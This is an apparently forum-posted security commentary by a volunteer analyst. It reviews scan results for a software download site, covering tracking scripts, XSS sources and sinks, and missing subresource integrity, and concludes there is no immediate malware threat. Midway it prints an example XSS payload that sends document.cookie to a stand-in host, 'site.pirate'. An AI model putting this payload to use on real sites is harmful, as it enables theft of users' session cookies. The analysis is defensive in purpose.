Hi RejZoR,
When you see what is running at that site:
http://retire.insecurity.today/#!/scan/60fc1c974bfdf490c2c49eb8c19231fceeae8d410bc8adf5544c38ac780280e3and you know what to block and are intented to willingly download the potential unwanted software,
because you are fully aware of any risks involved, then there is no risk downloading the tool.
Nothing to hold you back.
Script blockers block some of the third party code running on that website like: -http://dmp.theadex.com/d/105/21/s/adex.js
and -http://beacon-4.newrelic.com/1/26cb0a7878? and -http://js-agent.newrelic.com/nr-100.js
Well a developer of free tools have to make an income of sorts somewhere so tracking scripts galore on such a page,
resulting in that PUP alert.
Just see where this lands for instance:
http://www.domxssscanner.com/scan?url=http%3A%2F%2Fjs-agent.newrelic.com%2Fnr-100.jsThe code error next to the XSS sources and sinks:
detected] script
info: [decodingLevel=0] found JavaScript
error: line:3: SyntaxError: missing ; before statement:
error: line:3: ar NR_QUEUE=[];"undefined"!=typeof window.NREUMQ?NR_QUEUE=NREUMQ:"undefined"!=typeof window.EPISODES?NR_QUEUE=EPISODES.q:"undefined"!=typeof window.NREUM&&(NR_QUEUE=NREUM.q);var NREUM=NREUM||{};NREUM.q=NR_QUEUE,NREUM.targetOrigin=[i]document.location.protoco[/i]
error: line:3: ^
New Relic Google Episodes code that comes shared on the webs. Exceptions should be mitigated by re-copiing for errors.
So whenever you use free tools to-day you pay with some of your privacy and meta-data, it always comes at a price that you should be willing to pay or you should block what should be blocked at such a page.
Non-persistent cross-site-scripting attacks are possible here, depending on where code has access,
and could be performed via an attack like for instance
<SCRIPT>
document.location='http://site.pirate/cgi-bin/script.cgi?'+document.cookie
</SCRIPT>
.
Just to give an example for document.location.protoco -> document.location.href)+"&p="+NREUM.sHash(document.referrer)
and indeed there is room for insecurity for scripts running on the site, see:
https://sritest.io/#report/0cddf512-ac4d-4005-b3da-5be611dfeb93See:
http://www.domxssscanner.com/scan?url=http%3A%2F%2Fcdn.optimizely.com%2Fjs%2F507870057.js SRI hash missing
and Results from scanning URL:
http://cdn.optimizely.com/js/507870057.jsNumber of sources found: 103
Number of sinks found: 42
Could be a good idea to profoundly security test all the code on that website,
but i.m.h.o. there are no immediate malware threats not from the site nor from that tool,
better security could be implemented though, just be aware of the complicated code chain error consequences.
All works through on the general website's security infrastructure.
Have a nice day,
polonus (volunteer website security analyst and website error-hunter)